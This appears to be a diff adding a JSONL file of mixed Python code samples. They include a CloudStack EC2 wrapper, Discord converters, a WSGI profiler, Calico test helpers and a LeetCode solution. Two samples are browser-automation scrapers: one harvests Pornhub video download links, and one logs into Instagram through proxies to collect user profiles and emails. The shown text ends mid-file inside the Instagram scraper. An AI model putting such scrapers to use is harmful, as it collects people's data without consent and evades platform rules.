diff --git "a/5252.jsonl" "b/5252.jsonl" new file mode 100644--- /dev/null +++ "b/5252.jsonl" @@ -0,0 +1,815 @@ +{"seq_id":"537815763","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nfrom flask import current_app\n\nfrom ec2stack.providers import cloudstack\nfrom ec2stack.providers.cloudstack import requester, service_offerings, zones\nfrom ec2stack import helpers, errors\n\n\n@helpers.authentication_required\ndef describe_instances():\n args = {'command': 'listVirtualMachines'}\n response = cloudstack.describe_item(\n args, 'virtualmachine', errors.invalid_instance_id, 'InstanceId'\n )\n\n return _describe_instances_response(\n response\n )\n\n\ndef describe_instance_by_id(instance_id):\n args = {'id': instance_id, 'command': 'listVirtualMachines'}\n response = cloudstack.describe_item_request(\n args, 'virtualmachine', errors.invalid_instance_id\n )\n return response\n\n\ndef _describe_instances_response(response):\n return {\n 'template_name_or_list': 'instances.xml',\n 'response_type': 'DescribeInstancesResponse',\n 'response': response\n }\n\n\n@helpers.authentication_required\ndef describe_instance_attribute():\n instance_id = helpers.get('InstanceId')\n attribute = helpers.get('Attribute')\n\n supported_attribute_map = {\n 'instanceType': 'serviceofferingname',\n 'groupSet': 'securitygroup'\n }\n\n if attribute not in supported_attribute_map.iterkeys():\n errors.invalid_paramater_value(\n 'The specified attribute is not valid, please specify a valid ' +\n 'instance attribute.'\n )\n\n response = describe_instance_by_id(instance_id)\n return _describe_instance_attribute_response(\n response, attribute, supported_attribute_map)\n\n\ndef _describe_instance_attribute_response(response, attribute, attr_map):\n response = {\n 'template_name_or_list': 'instance_attribute.xml',\n 'response_type': 'DescribeInstanceAttributeResponse',\n 'attribute': attribute,\n 'response': response[attr_map[attribute]],\n 'id': response['id']\n }\n\n return response\n\n\n@helpers.authentication_required\ndef run_instance():\n helpers.require_parameters(\n ['ImageId', 'MinCount', 'MaxCount'])\n response = _run_instance_request()\n return _run_instance_response(response)\n\n\ndef _run_instance_request():\n args = {}\n\n if helpers.get('InstanceType') is None:\n instance_type = 'm1.small'\n else:\n instance_type = helpers.get('InstanceType')\n\n if instance_type in current_app.config['INSTANCE_TYPE_MAP']:\n instance_type = current_app.config[\n 'INSTANCE_TYPE_MAP'][instance_type]\n else:\n instance_type = instance_type\n\n args['serviceofferingid'] = \\\n service_offerings.get_service_offering(instance_type)['id']\n args['templateid'] = helpers.get('ImageId')\n\n if helpers.contains_parameter('Placement.AvailabilityZone'):\n args['zoneid'] = zones.get_zone(\n helpers.get('Placement.AvailabilityZone')\n )\n else:\n args['zoneid'] = zones.get_zone(\n current_app.config['CLOUDSTACK_DEFAULT_ZONE']\n )['id']\n\n if helpers.contains_parameter('KeyName'):\n args['keypair'] = helpers.get('KeyName')\n\n if helpers.contains_parameter('UserData'):\n args['userdata'] = helpers.get('UserData')\n\n if helpers.contains_parameter_with_keyword('SecurityGroupId.'):\n keys = helpers.get_request_parameter_keys('SecurityGroupId.')\n securitygroupids = []\n\n for key in keys:\n securitygroupids.append(helpers.get(key))\n\n args['securitygroupids'] = \",\".join(securitygroupids)\n\n if helpers.contains_parameter_with_keyword('SecurityGroup.'):\n keys = helpers.get_request_parameter_keys('SecurityGroup.')\n securitygroupnames = 
[]\n\n for key in keys:\n securitygroupnames.append(helpers.get(key))\n\n args['securitygroupnames'] = \",\".join(securitygroupnames)\n\n args['command'] = 'deployVirtualMachine'\n\n response = requester.make_request_async(args)\n\n return response\n\n\ndef _run_instance_response(response):\n if 'errortext' in response:\n if 'Invalid parameter templateid' in response['errortext']:\n errors.invalid_image_id()\n elif 'Unable to find group' in response['errortext']:\n errors.invalid_security_group()\n elif 'Invalid parameter securitygroupids' in response['errortext']:\n errors.invalid_security_group()\n elif 'A key pair with name' in response['errortext']:\n errors.invalid_keypair_name()\n else:\n errors.invalid_paramater_value(response['errortext'])\n else:\n response = response['virtualmachine']\n response = {\n 'template_name_or_list': 'run_instance.xml',\n 'response_type': 'RunInstancesResponse',\n 'response': response\n }\n\n return response\n\n\n@helpers.authentication_required\ndef start_instance():\n helpers.require_parameters(['InstanceId.1'])\n instance_id = helpers.get('InstanceId.1')\n previous_instance_state_description = describe_instance_by_id(instance_id)\n new_instance_state_description = _start_instance_request(instance_id)\n return _start_instance_response(\n previous_instance_state_description,\n new_instance_state_description\n )\n\n\ndef _start_instance_request(instance_id):\n args = {'command': 'startVirtualMachine',\n 'id': instance_id}\n\n response = requester.make_request_async(args)\n\n response = response['virtualmachine']\n\n return response\n\n\ndef _start_instance_response(previous_state, new_state):\n response = {\n 'template_name_or_list': 'change_instance_state.xml',\n 'response_type': 'StartInstancesResponse',\n 'previous_state': previous_state,\n 'new_state': new_state\n }\n\n return response\n\n\n@helpers.authentication_required\ndef terminate_instance():\n helpers.require_parameters(['InstanceId.1'])\n instance_id = helpers.get('InstanceId.1')\n previous_instance_state_description = describe_instance_by_id(instance_id)\n new_instance_state_description = _terminate_instance_request(instance_id)\n return _terminate_instance_response(\n previous_instance_state_description,\n new_instance_state_description\n )\n\n\ndef _terminate_instance_request(instance_id):\n args = {'command': 'destroyVirtualMachine',\n 'id': instance_id}\n\n response = requester.make_request_async(args)\n\n response = response['virtualmachine']\n\n return response\n\n\ndef _terminate_instance_response(previous_state, new_state):\n response = {\n 'template_name_or_list': 'change_instance_state.xml',\n 'response_type': 'TerminateInstancesResponse',\n 'previous_state': previous_state,\n 'new_state': new_state\n }\n\n return response\n\n\n@helpers.authentication_required\ndef stop_instance():\n helpers.require_parameters(['InstanceId.1'])\n instance_id = helpers.get('InstanceId.1')\n previous_instance_state_description = describe_instance_by_id(instance_id)\n new_instance_state_description = _stop_instance_request(instance_id)\n return _stop_instance_response(\n previous_instance_state_description,\n new_instance_state_description\n )\n\n\ndef _stop_instance_request(instance_id):\n args = {'command': 'stopVirtualMachine',\n 'id': instance_id}\n response = requester.make_request_async(args)\n response = response['virtualmachine']\n return response\n\n\ndef _stop_instance_response(previous_state, new_state):\n response = {\n 'template_name_or_list': 'change_instance_state.xml',\n 
'response_type': 'StopInstancesResponse',\n 'previous_state': previous_state,\n 'new_state': new_state\n }\n\n return response\n\n\n@helpers.authentication_required\ndef reboot_instance():\n helpers.require_parameters(['InstanceId.1'])\n instance_id = helpers.get('InstanceId.1')\n _reboot_instance_request(instance_id)\n return _reboot_instance_response()\n\n\ndef _reboot_instance_request(instance_id):\n args = {'command': 'rebootVirtualMachine',\n 'id': instance_id}\n response = requester.make_request_async(args)\n response = response['virtualmachine']\n return response\n\n\ndef _reboot_instance_response():\n response = {\n 'template_name_or_list': 'status.xml',\n 'response_type': 'RebootInstancesResponse',\n 'return': 'true'\n }\n\n return response\n","sub_path":"ec2stack/providers/cloudstack/instances.py","file_name":"instances.py","file_ext":"py","file_size_in_byte":8366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"517051903","text":"import discord\nimport string\n\nfrom discord.ext import commands\n\n\nclass without_whitespace(commands.clean_content):\n\n async def convert(self, ctx, arg):\n result = await super().convert(ctx, arg)\n\n if any(s in result for s in string.whitespace[1:]):\n raise commands.BadArgument(ctx.lang[\"fun\"][\"alpha_needed\"])\n\n return result\n\n\nclass EnumConverter(commands.Converter):\n\n __qualname__ = \"Enum\"\n\n def __init__(self, enum_cls):\n self.enum_cls = enum_cls\n\n async def convert(self, ctx, arg):\n arg = arg.lower()\n\n result = discord.utils.find(\n lambda x: x[0].lower() == arg,\n self.enum_cls.__members__.items())\n\n if result is None:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"cant_convert_enum\"].format(\n self.enum_cls.__qualname__))\n\n return result[1]\n\n @staticmethod\n def convert_value(enum_cls, value):\n return discord.utils.find(\n lambda x: x.value == value,\n enum_cls.__members__.values())\n\n\nclass CommandConverter(commands.Converter):\n\n __qualname__ = \"Command\"\n\n def __init__(self, cls=commands.Command):\n self.cls = cls\n\n async def convert(self, ctx, arg):\n command = ctx.bot.get_command(arg)\n\n if command is None:\n raise commands.BadArgument(ctx.lang[\"help\"][\"command_not_found\"])\n\n if not isinstance(command, self.cls):\n raise commands.BadArgument(ctx.lang[\"errors\"][\"ivalid_command\"].format(\n self.cls.__qualname__))\n\n return command\n\n\nclass ModuleConverter(commands.Converter):\n\n __qualname__ = \"Module\"\n\n async def convert(self, ctx, arg):\n module = ctx.bot.get_cog(arg)\n\n if module is None:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"invalid_module\"])\n\n return module\n\n\nclass uint(commands.Converter):\n\n __qualname__ = \"uint\"\n\n def __init__(self, include_zero=False):\n self.include_zero = include_zero\n\n async def convert(self, ctx, arg):\n arg = int(arg)\n\n if arg <= 0 and not self.include_zero:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"arg_over_zero\"])\n\n if arg < 0:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"arg_over_or_equal_zero\"])\n\n return ctx.bot.db._make_safe_value(arg)\n\n\nclass Index:\n\n __slots__ = (\"value\")\n __qualname__ = \"uint\"\n\n def __init__(self, value: int):\n self.value = value\n\n def humanize(self) -> int:\n return self.value + 1\n\n\nclass IndexConverter(uint):\n\n __qualname__ = \"uint\"\n\n async def convert(self, ctx, arg):\n convertered = await super().convert(ctx, arg) - 1\n\n return Index(convertered if convertered >= 0 else 0)\n\n\nclass 
HumanTime(commands.Converter):\n\n SECONDS_IN_YEAR = 31536000\n\n async def convert(self, ctx, arg):\n arg = arg.lower()\n\n seconds_in = ctx.lang[\"time_map\"]\n\n try:\n total_seconds = int(arg[:-1]) * seconds_in[arg[-1]]\n return min(max(1, total_seconds), self.SECONDS_IN_YEAR)\n except Exception:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"time_convert_failed\"])\n\n\nclass NotAuthor(commands.MemberConverter):\n\n async def convert(self, ctx, argument):\n member = await super().convert(ctx, argument)\n\n if member == ctx.author:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"cant_use_to_yourself\"])\n\n return member\n\n\nclass EqualMember(NotAuthor):\n\n async def convert(self, ctx, arg):\n member = await super().convert(ctx, arg)\n\n if member.top_role >= ctx.guild.me.top_role or ctx.guild.owner == member:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"member_over_bot\"].format(\n ctx.bot.user.mention, member.mention))\n\n if ctx.author == ctx.guild.owner:\n return member\n\n member_perms = ctx.channel.permissions_for(member)\n author_perms = ctx.channel.permissions_for(ctx.author)\n\n if author_perms <= member_perms and not ctx.bot.is_owner(ctx.author):\n raise commands.BadArgument(\n ctx.lang[\"errors\"][\"member_has_eq_over_perms\"].format(member.mention))\n\n return member\n\n\nclass EqualRole(commands.RoleConverter):\n\n async def convert(self, ctx, arg):\n role = await super().convert(ctx, arg)\n\n if role == ctx.guild.get_role(ctx.guild.id):\n raise commands.BadArgument(ctx.lang[\"errors\"][\"everyone_role\"])\n\n if role.managed:\n raise commands.BadArgument(ctx.lang[\"errors\"][\"managed_role\"].format(\n role.mention))\n\n if (role >= ctx.author.top_role and not ctx.bot.is_owner(ctx.author)) or \\\n role >= ctx.guild.me.top_role:\n raise commands.BadArgument(\n ctx.lang[\"errors\"][\"role_over_top_role\"].format(\n role.mention, ctx.bot.user.mention))\n\n return role\n","sub_path":"src/cogs/utils/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"150591443","text":"# some code taken from flask_debug toolbar\nimport time\nimport re\ntry:\n from cProfile import Profile\nexcept ImportError:\n from profile import Profile\nimport pstats\nfrom wsgiref.headers import Headers\nfrom jinja2 import Template\nfrom nanowsgiprofiler.helper import *\nif PY2:\n from Cookie import Cookie\nelse:\n from http.cookies import BaseCookie as Cookie\n\n\n_file_path = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(_file_path, 'profiler.html'), 'rb') as _f:\n _template = Template(_f.read().decode('utf-8'))\n\n_find_charset = re.compile(r'.+charset=([^ ;]+)')\n\n\nclass NanoProfilerMiddleware(object):\n SIMPLE_OUTPUT_TOGGLE_KEY = '__nanopro_s_o'\n\n def __init__(self, app, simple_output=True):\n self.toggle_key = '_profiler'\n self.enable_value = 'on'\n self._app = app\n self.simple_output = simple_output\n\n def _intercept_call(self):\n \"\"\"Return (run_app, resp_body, saved_ss_args). 
After calling run_app(environ)\n resp_body will contain response, and saved_ss_args contain args which\n app used to call start_response.\"\"\"\n resp_body, saved_ss_args = [], []\n\n def start_response_proxy(*args):\n saved_ss_args.extend(args)\n return resp_body.append\n\n def run_app(environ):\n app_iter = self._app(environ, start_response_proxy)\n resp_body.extend(app_iter)\n if hasattr(app_iter, 'close'):\n app_iter.close()\n\n return run_app, resp_body, saved_ss_args\n\n def __call__(self, environ, start_response):\n key_morsel = Cookie(environ.get('HTTP_COOKIE', '')).get(self.toggle_key)\n # useful vars\n query = query_str2dict(environ.get('QUERY_STRING'))\n enable_by_cookie = key_morsel.value == self.enable_value if key_morsel else False\n enable_by_query = query.get(self.toggle_key) == self.enable_value\n # pop toggle_key from query dic to avoid case: '?_profile=on&_profile='\n disable = query.pop(self.toggle_key, None) == '' # only can be disabled by query\n enable = not disable and (enable_by_query or enable_by_cookie)\n\n run_app, resp_body, saved_ss_args = self._intercept_call()\n\n # processing cookies and queries\n so = query.pop(self.SIMPLE_OUTPUT_TOGGLE_KEY, None)\n if so is not None:\n self.simple_output = so == 'True'\n cookie_to_set = None\n if enable_by_query and not enable_by_cookie:\n cookie_to_set = '%s=%s; Path=/; HttpOnly' % (self.toggle_key, self.enable_value)\n elif disable:\n cookie_to_set = '%s=; Path=/; Max-Age=1; HttpOnly' % self.toggle_key\n\n if enable:\n start = time.time()\n profile = Profile()\n profile.runcall(run_app, environ) # here we call the WSGI app\n elapsed = time.time() - start\n else:\n profile = elapsed = None # for annoying IDE\n run_app(environ)\n\n status, headers = saved_ss_args[:2]\n headers_dic = Headers(headers)\n if cookie_to_set:\n headers_dic.add_header('Set-Cookie', cookie_to_set)\n\n # insert result into response\n content_type = headers_dic.get('Content-Type', '')\n if (enable and status.startswith('200') and content_type.startswith('text/html')):\n environ['QUERY_STRING'] = dict2query_str(query)\n\n matched = _find_charset.match(content_type)\n encoding = matched.group(1) if matched else 'ascii'\n rendered = self.render_result(profile, elapsed, environ).encode(encoding, 'replace')\n resp_body = [insert_into_body(rendered, b''.join(resp_body))]\n headers_dic['Content-Length'] = str(len(resp_body[0]))\n start_response(status, headers, saved_ss_args[2] if len(saved_ss_args) == 3 else None)\n return resp_body\n\n def render_result(self, profile, time_elapsed, environ):\n profile.create_stats()\n stats = profile.stats\n fmt = '{:.2f}'.format\n\n function_calls = []\n for func, info in iteritems(stats):\n current = {}\n filename = pstats.func_std_string(func)\n # hide our hook functions\n if filename.startswith(_file_path):\n continue\n\n # col0: filename\n if filename.startswith(('{', '<')): # built-in functions\n name, name_full = filename, 'n/a'\n else: # functions from library and our project\n name, name_full = shorten_filename(filename), filename\n current['filename'], current['filename_full'] = name, name_full\n\n # skip functions that is in library or built-in\n if self.simple_output and name.startswith(('{', '<')):\n continue\n\n # col1: number of calls\n if info[0] != info[1]:\n current['ncalls'] = '%d/%d' % (info[1], info[0])\n else:\n current['ncalls'] = info[1]\n # col2: total time\n current['tottime'] = fmt(info[2] * 1000)\n # col3: quotient of total time divided by number of calls\n current['percall'] = fmt(info[2] * 
1000 / info[1]) if info[1] else 0\n            # col4: cumulative time\n            current['cumtime'] = fmt(info[3] * 1000)\n            # col5: quotient of the cumulative time divided by the number of\n            # primitive calls.\n            current['percall_cum'] = fmt(info[3] * 1000 / info[0]) if info[0] else 0\n\n            function_calls.append(current)\n\n        path = reconstruct_path(environ) + ('&' if environ.get('QUERY_STRING') else '?')\n\n        return _template.render(\n            ms_elapsed='{:.1f}'.format(time_elapsed * 1000),\n            function_calls=function_calls,\n            disable_url=path + '%s=' % self.toggle_key,\n            toggle_simple_output_url=path + '%s=%s' % (self.SIMPLE_OUTPUT_TOGGLE_KEY,\n                                                       not self.simple_output),\n            simple_output=self.simple_output\n        )\n","sub_path":"nanowsgiprofiler/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"450448824","text":"import time\nimport urllib.parse\n\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport requests\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nimport cachetools\n\nfrom lxml import etree\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport re\nimport redis\n\nredis = redis.Redis(host='127.0.0.1', port=6379, db=1)\n\nclass FastDriver(webdriver.Chrome):\n    def __init__(self):\n        options = webdriver.ChromeOptions()\n\n        # 1 allow all images; 2 block all images; 3 block third-party server images\n        prefs = {\n            'profile.default_content_setting_values': {\n                'images': 2\n            }\n        }\n        options.add_experimental_option('prefs', prefs)\n        # incognito mode\n        options.add_argument(\"--incognito\")\n        options.add_argument(\"--headless\")\n        capa = DesiredCapabilities.CHROME\n        capa[\"pageLoadStrategy\"] = \"none\"\n        super().__init__(options=options, desired_capabilities=capa)\n\n\ndef get_urls_data():\n    key = '腿'  # search keyword ('leg')\n    for page in range(10):\n        url = 'https://www.pornhub.com/video/search?search=%s&page=%s' % (\n            key, str(page + 1))\n        print('--->starting page %d'%page)\n        yield get_page_data(url)\n\n\ndef get_page_data(url):\n    # drive = webdriver.Chrome()\n    driver = FastDriver()\n    try:\n        driver.get(url)\n        WebDriverWait(driver, 20).until(\n            EC.presence_of_element_located((By.ID, 'videoSearchResult')))\n    except:\n        print('Loading took more than 20 seconds, force-stopping the load....')\n        # When the page takes longer than the set time to load, stop loading by executing Javascript so the following steps can run\n    data = driver.page_source\n    driver.close()\n    return data\n\n\ndef get_url(data):\n    URL = 'https://www.pornhub.com'\n    # file = open('1.html', encoding='utf-8')\n    # data = file.read()\n    # noinspection PyUnresolvedReferences\n    html = etree.HTML(data)\n    title = html.xpath(\n        '//ul[@id=\"videoSearchResult\"]//span[@class=\"title\"]/a/@title')\n    url = html.xpath(\n        '//ul[@id=\"videoSearchResult\"]//span[@class=\"title\"]/a/@href')\n    rate = html.xpath(\n        '//div[@class=\"rating-container up\"]//div[@class=\"value\"]/text()')\n    result = []\n    for _ in range(20):\n        result.append({\"url\": URL + url[_], \"title\": title[_],'rate':int(rate[_][:-1])})\n\n\n    return result\n\n\ndef get_down_load_rul(url):\n    drive = FastDriver()\n    try:\n        drive.get('https://www.savido.net')\n        WebDriverWait(drive, 20).until(\n            EC.presence_of_element_located((By.ID, 'curl')))\n        drive.find_element_by_id('curl').send_keys(url)\n        drive.find_element_by_id('downloadButton').click()\n        WebDriverWait(drive, 20).until(\n            EC.presence_of_element_located((By.CLASS_NAME, 
'table-responsive')))\n        data = drive.page_source\n        html = etree.HTML(data)\n        links = html.xpath('//td/a/@href')\n    except:\n        time.sleep(10)\n        return\n    drive.close()\n    if len(links) > 0:\n        return links.pop()\n\n\ndef main():\n    for page_data in get_urls_data():\n        for _ in get_url(page_data):\n            _url = _.get('url')\n            _title = _.get('title')\n            _rate = _.get('rate',0)\n            if _rate<60:\n                continue\n            url = get_down_load_rul(_url)\n            print('--->start fetching %s'%url)\n            if url:\n                file = open('3.txt', encoding='utf-8', mode='a')\n                file.write(url + '\\n')\n                file.close()\n                video = re.search(r\"\\w+_.+\\.mp4\",url).group()\n                if video:\n                    redis.set(video, _title)\n                    print('-->successfully fetched %s'%_title)\n            # url_down_load(url,_title)\n\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"demo/web_drive.py","file_name":"web_drive.py","file_ext":"py","file_size_in_byte":3997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"487226017","text":"# Definition for a binary tree node.\r\n# class TreeNode(object):\r\n#     def __init__(self, x):\r\n#         self.val = x\r\n#         self.left = None\r\n#         self.right = None\r\n\r\n\"\"\"BFS approach\"\"\"\r\n\r\n#Accepted on Leetcode\r\n#Time complexity - O(N) as we are visiting every node\r\n#Space complexity - O(N) for queue\r\n\r\n\r\nfrom collections import deque\r\nimport sys\r\n\r\nclass Solution(object):\r\n    def largestValues(self, root):\r\n        \"\"\"\r\n        :type root: TreeNode\r\n        :rtype: List[int]\r\n        \"\"\"\r\n        res = []\r\n        #Edge case\r\n        if root == None:\r\n            return res\r\n        q = deque()\r\n        q.append(root)\r\n        while len(q) > 0:\r\n            size = len(q)\r\n            max_val = -sys.maxsize - 1 #Setting max_val to be the machine's lowest word size\r\n            for i in range(size):\r\n                curr = q.popleft()\r\n                if curr.val >= max_val:\r\n                    max_val = curr.val\r\n                if curr.left:\r\n                    q.append(curr.left)\r\n                if curr.right:\r\n                    q.append(curr.right)\r\n            res.append(max_val)\r\n        return res","sub_path":"largestvalueinTreeRow.py","file_name":"largestvalueinTreeRow.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"218503720","text":"# Copyright (c) 2015-2016 Tigera, Inc. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport json\nimport logging\nimport os\nimport re\nimport socket\nimport sys\nfrom subprocess import CalledProcessError\nfrom subprocess import check_output, STDOUT\n\nimport termios\n\nfrom tests.st.utils.exceptions import CommandExecError\n\nLOCAL_IP_ENV = \"MY_IP\"\nLOCAL_IPv6_ENV = \"MY_IPv6\"\nlogger = logging.getLogger(__name__)\n\nETCD_SCHEME = os.environ.get(\"ETCD_SCHEME\", \"http\")\nETCD_CA = os.environ.get(\"ETCD_CA_CERT_FILE\", \"\")\nETCD_CERT = os.environ.get(\"ETCD_CERT_FILE\", \"\")\nETCD_KEY = os.environ.get(\"ETCD_KEY_FILE\", \"\")\nETCD_HOSTNAME_SSL = \"etcd-authority-ssl\"\n\n\"\"\"\nCompile Regexes\n\"\"\"\n# Splits into groups that start w/ no whitespace and contain all lines below\n# that start w/ whitespace\nINTERFACE_SPLIT_RE = re.compile(r'(\\d+:.*(?:\\n\\s+.*)+)')\n# Grabs interface name\nIFACE_RE = re.compile(r'^\\d+: (\\S+):')\n# Grabs v4 addresses\nIPV4_RE = re.compile(r'inet ((?:\\d+\\.){3}\\d+)/\\d+')\n# Grabs v6 addresses\nIPV6_RE = re.compile(r'inet6 ([a-fA-F\\d:]+)/\\d{1,3}')\n\n\ndef calicoctl(command):\n \"\"\"\n Convenience function for abstracting away calling the calicoctl\n command.\n\n Raises a CommandExecError() if the command returns a non-zero\n return code.\n\n :param command: The calicoctl command line parms as a single string.\n :return: The output from the command with leading and trailing\n whitespace removed.\n \"\"\"\n calicoctl = os.environ.get(\"CALICOCTL\", \"/code/dist/calicoctl\")\n\n if ETCD_SCHEME == \"https\":\n etcd_auth = \"%s:2379\" % ETCD_HOSTNAME_SSL\n else:\n etcd_auth = \"%s:2379\" % get_ip()\n # Export the environment, in case the command has multiple parts, e.g.\n # use of | or ;\n #\n # Pass in all etcd params, the values will be empty if not set anyway\n calicoctl = \"export ETCD_AUTHORITY=%s; \" \\\n \"export ETCD_SCHEME=%s; \" \\\n \"export ETCD_CA_CERT_FILE=%s; \" \\\n \"export ETCD_CERT_FILE=%s; \" \\\n \"export ETCD_KEY_FILE=%s; %s\" % \\\n (etcd_auth, ETCD_SCHEME, ETCD_CA, ETCD_CERT, ETCD_KEY,\n calicoctl)\n\n return log_and_run(calicoctl + \" \" + command)\n\n\ndef get_ip(v6=False):\n \"\"\"\n Return a string of the IP of the hosts interface.\n Try to get the local IP from the environment variables. This allows\n testers to specify the IP address in cases where there is more than one\n configured IP address for the test system.\n \"\"\"\n env = LOCAL_IPv6_ENV if v6 else LOCAL_IP_ENV\n ip = os.environ.get(env)\n if not ip:\n logger.debug(\"%s not set; try to auto detect IP.\", env)\n socket_type = socket.AF_INET6 if v6 else socket.AF_INET\n s = socket.socket(socket_type, socket.SOCK_DGRAM)\n remote_ip = \"2001:4860:4860::8888\" if v6 else \"8.8.8.8\"\n s.connect((remote_ip, 0))\n ip = s.getsockname()[0]\n s.close()\n else:\n logger.debug(\"Got local IP from %s=%s\", env, ip)\n\n return ip\n\n\n# Some of the commands we execute like to mess with the TTY configuration, which can break the\n# output formatting. 
As a workaround, save off the terminal settings and restore them after\n# each command.\n_term_settings = termios.tcgetattr(sys.stdin.fileno())\n\n\ndef log_and_run(command, raise_exception_on_failure=True):\n    def log_output(results):\n        if results is None:\n            logger.info(\" # \")\n            return\n\n        lines = results.split(\"\\n\")\n        for line in lines:\n            logger.info(\" # %s\", line.rstrip())\n\n    try:\n        logger.info(\"%s\", command)\n        try:\n            results = check_output(command, shell=True, stderr=STDOUT).rstrip()\n        finally:\n            # Restore terminal settings in case the command we ran manipulated them. Note:\n            # under concurrent access, this is still not a perfect solution since another thread's\n            # child process may break the settings again before we log below.\n            termios.tcsetattr(sys.stdin.fileno(), termios.TCSADRAIN, _term_settings)\n        log_output(results)\n        return results\n    except CalledProcessError as e:\n        # Wrap the original exception with one that gives a better error\n        # message (including command output).\n        logger.info(\" # Return code: %s\", e.returncode)\n        log_output(e.output)\n        if raise_exception_on_failure:\n            raise CommandExecError(e)\n\ndef curl_etcd(path, options=None, recursive=True, ip=None):\n    \"\"\"\n    Perform a curl to etcd, returning JSON decoded response.\n    :param path: The key path to query\n    :param options: Additional options to include in the curl\n    :param recursive: Whether we want recursive query or not\n    :return: The JSON decoded response.\n    \"\"\"\n    if options is None:\n        options = []\n    if ETCD_SCHEME == \"https\":\n        # Etcd is running with SSL/TLS, require key/certificates\n        rc = check_output(\n            \"curl --cacert %s --cert %s --key %s \"\n            \"-sL https://%s:2379/v2/keys/%s?recursive=%s %s\"\n            % (ETCD_CA, ETCD_CERT, ETCD_KEY, ETCD_HOSTNAME_SSL,\n               path, str(recursive).lower(), \" \".join(options)),\n            shell=True)\n    else:\n        rc = check_output(\n            \"curl -sL http://%s:2379/v2/keys/%s?recursive=%s %s\"\n            % (ip, path, str(recursive).lower(), \" \".join(options)),\n            shell=True)\n\n    return json.loads(rc.strip())\n\ndef wipe_etcd(ip):\n    # Delete /calico if it exists. 
This ensures each test has an empty data\n # store at start of day.\n curl_etcd(\"calico\", options=[\"-XDELETE\"], ip=ip)\n\n # Disable Usage Reporting to usage.projectcalico.org\n # We want to avoid polluting analytics data with unit test noise\n curl_etcd(\"calico/v1/config/UsageReportingEnabled\",\n options=[\"-XPUT -d value=False\"], ip=ip)\n","sub_path":"tests/st/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"68918455","text":"'''Instagram WebScraping Following Collector'''\n\nfrom bs4 import BeautifulSoup\nfrom seleniumwire import webdriver\nfrom selenium.common.exceptions import InvalidArgumentException, NoSuchElementException, TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom scraper.models import Users\nfrom time import sleep\nimport re\n\n\nclass Cliker:\n def __init__(self, profiles, private_only: False, business_only: False, email_only: False, proxy_port: None,\n proxy: ''):\n self.business_only = business_only\n self.private_only = private_only\n self.email_only = email_only\n self.profiles = profiles\n self.options = None\n\n if proxy != '':\n self.options = {\n 'proxy': {\n 'http': 'http://{}'.format(proxy),\n 'https': 'https://{}'.format(proxy),\n 'no_proxy': 'localhost,127.0.0.1,dev_server:8080'\n }\n }\n\n firefox_profile = webdriver.FirefoxProfile()\n firefox_profile.set_preference(\"intl.accept_languages\", 'en-us')\n firefox_profile.update_preferences()\n\n fireFoxOptions = webdriver.FirefoxOptions()\n fireFoxOptions.headless = True\n\n try:\n self.driver = webdriver.Firefox(seleniumwire_options=self.options, firefox_profile=firefox_profile,\n firefox_options=fireFoxOptions)\n sleep(5)\n self.driver.set_window_position(0, 0)\n self.driver.set_window_size(1024, 768)\n\n except InvalidArgumentException:\n raise exit()\n\n self.driver.get('https://www.instagram.com/')\n sleep(2)\n\n def login(self, phone, password):\n try:\n WebDriverWait(self.driver, 60).until(\n EC.presence_of_element_located((By.XPATH, '//*[@id=\"loginForm\"]/div/div[2]/div/label/input')))\n except TimeoutException:\n raise TimeoutException\n\n phone_field = self.driver.find_element_by_xpath('//*[@id=\"loginForm\"]/div/div[1]/div/label/input')\n password_field = self.driver.find_element_by_xpath('//*[@id=\"loginForm\"]/div/div[2]/div/label/input')\n phone_field.send_keys(phone)\n password_field.send_keys(password)\n login = self.driver.find_element_by_xpath('//*[@id=\"loginForm\"]/div/div[3]/button/div')\n WebDriverWait(self.driver, 60).until(\n EC.element_to_be_clickable((By.XPATH, '//*[@id=\"loginForm\"]/div/div[3]/button/div')))\n self.driver.execute_script(\"arguments[0].click();\", login)\n\n def find_profile(self, profile):\n try:\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located(\n (By.XPATH, '//*[@id=\"react-root\"]/section/nav/div[2]/div/div/div[2]/input')))\n except: pass\n\n self.driver.get('https://www.instagram.com/{}'.format(profile))\n sleep(2)\n\n def click_following(self):\n try:\n WebDriverWait(self.driver, 60).until(\n EC.presence_of_element_located(\n (By.XPATH, 